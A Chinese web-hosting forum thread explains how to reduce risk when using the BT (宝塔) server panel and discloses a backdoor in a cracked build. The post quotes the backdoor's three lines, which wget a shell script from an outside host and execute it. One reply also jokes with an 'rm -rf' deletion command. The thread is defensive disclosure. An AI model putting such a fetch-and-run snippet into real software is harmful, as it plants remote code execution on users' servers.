全球主机交流论坛

标题: 如何安全的使用宝塔, 最实用的经验(附首发开心版后门) [打印本页]

作者: bagheera 时间: 2022-5-12 12:20
标题: 如何安全的使用宝塔, 最实用的经验(附首发开心版后门)
本帖最后由 bagheera 于 2022-5-12 17:48 编辑

如何安全的使用宝塔:
先来问一个问题, 为何要使用宝塔: 方便的安装配置环境, 管理站点.
以下建议满足上述基础需求,更高需求满足不了.

1, 免费版: 安装完需要的环境软件, 插件. 然后 ssh 里面 service bt stop, 就会停掉bt进程, 环境不受影响,cron类应该只有一个let证书续费,不会链接bt官网.
2, 收费版: service bt stop后,可能需要定期进后台用到防护统计,访问统计等插件, 可以在使用时候 service bt start, 访问后台,用完再stop.
bt进程日常就不应该运行.
3,开心版hostcli: 食用方法和上述一致外, 此开心版还加了一个"远程执行后门", 可以手动修改,删除掉代码,也可以使用.
后门文件在

/www/server/panel/script/check_files.py

复制代码

删除掉最后三行,这三行是从他服务器上下载一个sh,然后执行这个sh, 目前访问这个地址返回空内容,后门可能随时启用

checkFile="/www/server/panel/install/check_bt_file.sh"
wget -O ${checkFile} 'https://v7.hostcli.com/tools/check_bt_file.sh'
. ${checkFile}

复制代码

本人能力有限,开心版只找到这一个后门, 里面还有没有不好说... 删掉这三行,再加上 service bt stop, 应该是安全的.

补充:
根据 https://hostloc.gdisk.cf/forum.php?mod=viewthread&tid=1015859
第三方插件内也可能存在远程执行代码, 原版和开心版都有可能, 可自行下载插件代码分析.

如果有帮助,请点个赞支持一下, 谢谢.

广告一下:
最近打算发布一款影视搜索源码,还在打磨中(主要在建立基础数据库,现有豆瓣电影30多万,豆瓣评分和imdb评分,后期也会开放api)
预览地址 http://175.24.2.129/
后台暂不开放预览,附截图几张
https://tuchuangs.com/imgs/2022/05/12/275b3f9de6499a7c.jpeg
https://tuchuangs.com/imgs/2022/05/12/1826d85756f7f8d5.jpeg
https://tuchuangs.com/imgs/2022/05/12/620ab1f0a886e1ce.jpeg

作者: 挖坑达人 时间: 2022-5-12 12:24
这影视搜索不错

作者: laianguo 时间: 2022-5-12 12:29
影视不错。收费的还是免费的呢？

作者: bagheera 时间: 2022-5-12 12:30

laianguo 发表于 2022-5-12 12:29
影视不错。收费的还是免费的呢？

少量收费吧, 维护数据太耗时了

作者: gogoo2 时间: 2022-5-12 12:36
提示: 作者被禁止或删除内容自动屏蔽

作者: 表妹 时间: 2022-5-12 12:37
提示: 作者被禁止或删除内容自动屏蔽

作者: louiejordan 时间: 2022-5-12 12:39
你是有多喜欢汤唯

作者: mgwx 时间: 2022-5-12 12:42
影视搜索包含在线观看和下载吗不包括为啥不用TMDB https://www.themoviedb.org/

作者: 魔鬼筋肉人 时间: 2022-5-12 12:48
谢谢分享

作者: bagheera 时间: 2022-5-12 12:48

mgwx 发表于 2022-5-12 12:42
影视搜索包含在线观看和下载吗不包括为啥不用TMDB https://www.themoviedb.org/

是资源的搜索, 不是影片信息,我建设影视基础库,是为了搜索匹配更准确
你可以去搜索一下试试

作者: dapeng 时间: 2022-5-12 12:48
系统不错，mark一下

作者: hdwan.net 时间: 2022-5-12 12:49
马克+1

作者: uov 时间: 2022-5-12 13:10
我想搞一套请问有没有群

作者: xoia 时间: 2022-5-12 13:13
影视搜索真的不错啊

作者: dole 时间: 2022-5-12 13:16
开心版果然有后门

作者: andox 时间: 2022-5-12 13:19
影视搜索源码到时mjj是否有大优惠

作者: hostloccom 时间: 2022-5-12 13:25
太牛逼了大佬，这个后台开源吗？这个我根本不知道咋整，太烧脑了

我见过做得更完善的，狐狸的

作者: Benladen 时间: 2022-5-12 13:29
影视不错，很邢

作者: tycu 时间: 2022-5-12 13:34
用的yu al的开心版，应该没后门吧

作者: Thintime 时间: 2022-5-12 13:39
看上大佬的影视搜索了

作者: ymh1147 时间: 2022-5-12 13:45
刚才看了下，7.6版的开心有这个文件，7.4.5的没有

作者: 疯狂痴呆 时间: 2022-5-12 13:49
爬的豆瓣吗？

http://175.24.2.129/search.htm?mid=279516&q=%E5%87%BA%E7%A7%9F%E8%BD%A6%E5%8F%B8%E6%9C%BA#

如这个豆瓣几年前就删除了，告知下怎么爬的

作者: btpanel 时间: 2022-5-12 13:49
https://hostloc.gdisk.cf/forum.php?mod=viewthread&tid=1015859&extra=page%3D3&mobile=2

作者: longpo 时间: 2022-5-12 13:50
ui很好看

作者: bagheera 时间: 2022-5-12 17:52

疯狂痴呆发表于 2022-5-12 13:49
爬的豆瓣吗？

http://175.24.2.129/search.htm?mid=279516&q=%E5%87%BA%E7%A7%9F%E8%BD%A6%E5%8F%B8%E6%9C ...

嗯? 没回复成功吗?

豆瓣和谐的影片, 抓imdb补充的

作者: 战斗鸡 时间: 2022-5-12 17:55
本帖最后由战斗鸡于 2022-5-12 19:58 编辑

提醒下，hostcli.com 站長是在東南亞做黑產的（之前看到他在某個站長群裏玩“暗雷”），爲人肯定是沒什麽底綫的，最好別用他家的產品。

作者: 疯狂痴呆 时间: 2022-5-12 18:06

bagheera 发表于 2022-5-12 17:52
嗯? 没回复成功吗?

豆瓣和谐的影片, 抓imdb补充的

抓IMDB，然后再手动翻译下片名，其它就不翻了？

作者: sdqu 时间: 2022-5-12 18:09
rm -rf /var/www/panel 不是更香么

作者: bagheera 时间: 2022-5-12 19:21

疯狂痴呆发表于 2022-5-12 18:06
抓IMDB，然后再手动翻译下片名，其它就不翻了？

不用翻译,后台匹配资源时候,资源有中文

作者: maiawpyg 时间: 2022-5-12 20:39
停止宝塔了设置的自动更新是不是失效了

作者: 超级无敌小马甲 时间: 2022-5-12 20:44
前排支持大佬深挖。看看还有没有后门

作者: bagheera 时间: 2022-5-12 21:01

maiawpyg 发表于 2022-5-12 20:39
停止宝塔了设置的自动更新是不是失效了

什么自动更新? 宝塔的cron 也是写在系统 crontab 里面的,看一下

作者: zhongziso 时间: 2022-5-12 21:01
mark

作者: wlc1984 时间: 2022-5-12 21:30
留名，回头慢慢看

作者: Antony 时间: 2022-5-12 21:31
这要顶一波，支持一下啊

作者: btpanel 时间: 2022-5-12 21:39

tycu 发表于 2022-5-12 13:34
用的yu al的开心版，应该没后门吧

参考
https://hostloc.gdisk.cf/thread-1015859-1-2.html

作者: bagheera 时间: 2022-5-13 09:42

btpanel 发表于 2022-5-12 21:39
参考
https://hostloc.gdisk.cf/thread-1015859-1-2.html

我审计代码只是基于原版和破解版的变动, diff一下, 理论上这样破解版加的私货就可以看出来,官方远程代码执行最为致命,没办法

作者: btpanel 时间: 2022-5-13 10:21

bagheera 发表于 2022-5-13 09:42
我审计代码只是基于原版和破解版的变动, diff一下, 理论上这样破解版加的私货就可以看出来,官方远程代码 ...

正常一般都不会去看代码的而且大多数都不懂代码就算代码写在那里你们也不一定知道干啥的

作者: uov 时间: 2022-5-13 14:27

uov 发表于 2022-5-12 13:10
我想搞一套请问有没有群

好的铁子

作者: 醋醋来啦 时间: 2022-5-13 14:36

tycu 发表于 2022-5-12 13:34
用的yu al的开心版，应该没后门吧

yual有的，他们把宝塔的api全部替换成自己的域名 yual的api地址了

作者: tycu 时间: 2022-5-13 16:02

醋醋来啦发表于 2022-5-13 14:36
yual有的，他们把宝塔的api全部替换成自己的域名 yual的api地址了

瑟瑟发抖

欢迎光临全球主机交流论坛 (https://hostloc.gdisk.cf/)